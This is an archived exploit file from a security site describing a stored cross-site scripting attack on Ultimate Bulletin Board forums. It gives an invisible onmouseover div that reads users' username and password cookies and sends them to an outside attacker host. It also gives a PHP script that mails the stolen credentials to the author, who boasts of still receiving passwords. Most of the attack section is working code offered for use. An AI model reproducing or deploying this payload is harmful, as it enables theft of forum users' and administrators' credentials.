what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ultimate-bb.txt

ultimate-bb.txt
Posted Feb 16, 2001
Authored by Unregistered

The Ultimate Bulletin Board System allows remote users to get the username and pass of anyone that is a registered user of a ubb forum that has html enabled and uses cookies to store the username and passwords of the users.

tags | exploit, remote
SHA-256 | 9d5082efd21f409b5ad3daca83e818ef19b075ca500641904a82ae2d168d2cb3

ultimate-bb.txt

Change Mirror Download
<------explaination    -------->
I set up a script on some server somewhere that will mail me the contents of
"whatever" in a url query as such ->
http://somehost.com/somescript.php/cgi/pl/asp?contents="whatever"
when I have that script in place I post a message on the board that I wish
to steal peoples passes from with(for Internet Explorer, for Netscape use
the <layer> tag) a <div> tag in it that positions itself on a prominent part
of the page that is likely to have someone put their mouse over it. The
<div> tag has the "onmouseover" javascript event handler and calls for the
"getCookie('cookiename')" javascript function definded by the UBB output for
the "reply" page, and it adds the contents of the unfortuneate victims user
and pass cookies to the end of the link. This of course would then email
the user and pass to me whenever someone moved their mouse over the
invisible <div> area while on the reply page. NOTE: the script does nothing
but give a non-popup javascript error in the lower left of the browser
screen on the thread "view" page, so no one knows whats going on and it
looks like a normal thread.
<--------end explaination------------>
i have done this and it works, I am still recieving passwords in my mail
box.
<***************begin actual scripts***************>
this is the php script that i use to mail me the user/pass combos:
<---------begin php file-------------->
<?php
if ($contents && $header){
mail("xavic_doute@hotmail.com" , "from mail script",$contents,$header) or
die('couldnt email it');
sleep(2);
?>
<script language=javascript>
<!--
history.go(-1);
// -->
</script>
<?php
} else {
echo "nope";
}
?>
<--------------end php file----------->
this is what you need to include in the post on the board:
<-----------begin html+script--------->
<div
onmouseover='top.location.href="http://somehost.net/mail.php?header=from:victim@theboard.net&contents="+getCookie("UserName")+":"+getCookie("Password");'
position=absolute style="position:absolute;top:270px;left:0px;"><table
width=100% height=30 border=0><tr><td> </td></tr></table></div>
<-----------end html+script----------->
<***************end actual scripts***************>

if you publish this as some sort of exploit or something keep in mind that
even the mods and admin of the boards can have their passes stolen this way.
that means that if they use the same pass for the server then the servers
security can be compromised with this(alot of people use the same passes for
many things as im sure you know).

-Unregistered
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close